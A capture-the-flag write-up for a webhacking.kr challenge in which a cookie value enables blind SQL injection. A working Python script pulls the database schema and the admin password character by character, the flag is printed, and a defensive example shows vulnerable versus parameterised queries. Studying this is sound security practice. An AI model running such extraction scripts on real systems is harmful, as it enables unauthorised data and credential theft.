# old-02 (500)

The page source looks like this:

```markup
<!--
2020-01-16 04:23:24
-->
<h2>Restricted area</h2>Hello stranger. Your IP is logging...<!-- if you access admin.php i will kick your ass -->
```

Visiting <https://webhacking.kr/challenge/web-02/admin.php> shows a form for submitting a password.

Going back to the main page and checking the cookies, there is a cookie named `time`.

When the cookie value is true, the timestamp in the page source becomes `2070-01-01 09:00:01`; when it is false, it becomes `2070-01-01 09:00:00`.

From this we can infer that the challenge is a Blind SQL Injection problem.

Written in Python, the code looks like this:

```python
import urllib.request

URL = 'https://webhacking.kr/challenge/web-02/'
TRUE_PHRASE = '2070-01-01 09:00:01'  # timestamp rendered when the injected condition is true


def query(payload):
    """Send the condition in the `time` cookie and report whether it evaluated to true."""
    req = urllib.request.Request(URL)
    req.add_header('Cookie', 'time=' + payload)
    r = urllib.request.urlopen(req)
    content = r.read().decode('utf-8')
    return TRUE_PHRASE in content


# result: 6
def find_db_name_len():
    db_name_len = 1
    while not query('LENGTH(DATABASE()) = {}'.format(db_name_len)):
        db_name_len += 1
    print('db_name_len: {}'.format(db_name_len))
    return db_name_len


# result: chall2
def find_db_name():
    db_name_len = find_db_name_len()
    db_name = ''
    # one character at a time: compare the ASCII code at each position
    for pos in range(1, db_name_len + 1):
        for character in range(0, 128):
            if query('ASCII(SUBSTR(DATABASE(), {}, 1)) = {}'.format(pos, character)):
                db_name += chr(character)
                break
    print('db_name: {}'.format(db_name))
    return db_name


# result: 13
def find_table_name_length(db_name):
    table_name_len = 1
    while not query('LENGTH((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA="{}" LIMIT 0, 1)) = {}'.format(db_name, table_name_len)):
        table_name_len += 1
    print('table_name_len: {}'.format(table_name_len))
    return table_name_len


# result: admin_area_pw
def find_table_name():
    db_name = find_db_name()
    table_name_len = find_table_name_length(db_name)
    table_name = ''
    for pos in range(1, table_name_len + 1):
        for character in range(0, 128):
            if query('ASCII(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA = "{}" LIMIT 0, 1), {}, 1)) = {}'.format(db_name, pos, character)):
                table_name += chr(character)
                break
    print('table_name: {}'.format(table_name))
    return table_name


# result: 2
def find_column_name_length(table_name):
    column_name_len = 1
    while not query('LENGTH((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME="{}" LIMIT 0, 1)) = {}'.format(table_name, column_name_len)):
        column_name_len += 1
    print('column_name_len: {}'.format(column_name_len))
    return column_name_len


# result: pw
def find_column_name(table_name):
    column_name_len = find_column_name_length(table_name)
    column_name = ''
    for pos in range(1, column_name_len + 1):
        for character in range(0, 128):
            if query('ASCII(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME="{}" LIMIT 0, 1), {}, 1)) = {}'.format(table_name, pos, character)):
                column_name += chr(character)
                break
    print('column_name: {}'.format(column_name))
    return column_name


# result: 17
def find_pw_length(column_name, table_name):
    pw_len = 1
    while not query('LENGTH((SELECT {} FROM {} LIMIT 0, 1)) = {}'.format(column_name, table_name, pw_len)):
        pw_len += 1
    print('pw_len: {}'.format(pw_len))
    return pw_len


# result: kudos_to_beistlab
def find_pw():
    table_name = find_table_name()
    column_name = find_column_name(table_name)
    pw_len = find_pw_length(column_name, table_name)
    pw = ''
    for pos in range(1, pw_len + 1):
        for character in range(0, 128):
            if query('ASCII(SUBSTR((SELECT {} FROM {} LIMIT 0, 1), {}, 1)) = {}'.format(column_name, table_name, pos, character)):
                pw += chr(character)
                break
    print('pw: {}'.format(pw))
    return pw


if __name__ == '__main__':
    find_pw()
```

Running the code shows that `pw` is `kudos_to_beistlab`.

Entering this value into the form at <https://webhacking.kr/challenge/web-02/admin.php> and submitting it solves the challenge.
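As an added defender-side example (not part of this write-up, and not the challenge's real server code), the following shows why a one-second difference in a rendered timestamp is enough of an oracle, and the fix. It assumes a hypothetical backend that turns the `time` cookie into a timestamp, simulated here with SQLite's `datetime(..., 'unixepoch')`; the table `admin_area_pw` and its content are constructed to mirror the names on the page.

```python
import re
import sqlite3

# Hypothetical backend (constructed for this example): the "time" cookie is
# turned into a timestamp. SQLite's datetime(..., 'unixepoch') stands in for
# the challenge's real MySQL query, which the write-up does not show.
conn = sqlite3.connect(':memory:')
conn.execute('CREATE TABLE admin_area_pw (pw TEXT)')  # constructed, mirrors the page's names
conn.execute("INSERT INTO admin_area_pw VALUES ('constructed_secret')")


def render_vulnerable(time_cookie):
    """Cookie spliced into the SQL text: any expression the client sends is
    evaluated, and true/false shows up as a one-second difference in the
    rendered timestamp (the same oracle the write-up observes)."""
    sql = "SELECT datetime({}, 'unixepoch')".format(time_cookie)
    return conn.execute(sql).fetchone()[0]


COOKIE_RE = re.compile(r'[0-9]{1,10}')  # a plain epoch integer is the only valid shape


def render_hardened(time_cookie):
    """Allow-list the cookie as a plain integer, then bind it as a parameter.
    Binding alone already stops injection; the allow-list additionally makes
    probing visible as rejected requests that can be logged and alerted on."""
    if not COOKIE_RE.fullmatch(time_cookie):
        raise ValueError('rejected time cookie: {!r}'.format(time_cookie))
    return conn.execute("SELECT datetime(?, 'unixepoch')", (int(time_cookie),)).fetchone()[0]


def hardened_rejects(time_cookie):
    """True if the hardened handler refuses the value (quick self-check helper)."""
    try:
        render_hardened(time_cookie)
    except ValueError:
        return True
    return False


if __name__ == '__main__':
    probe = 'LENGTH((SELECT pw FROM admin_area_pw)) = 18'
    print(render_vulnerable('1'), render_vulnerable(probe))  # both end in 00:00:01
    print(hardened_rejects(probe))                           # True
```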
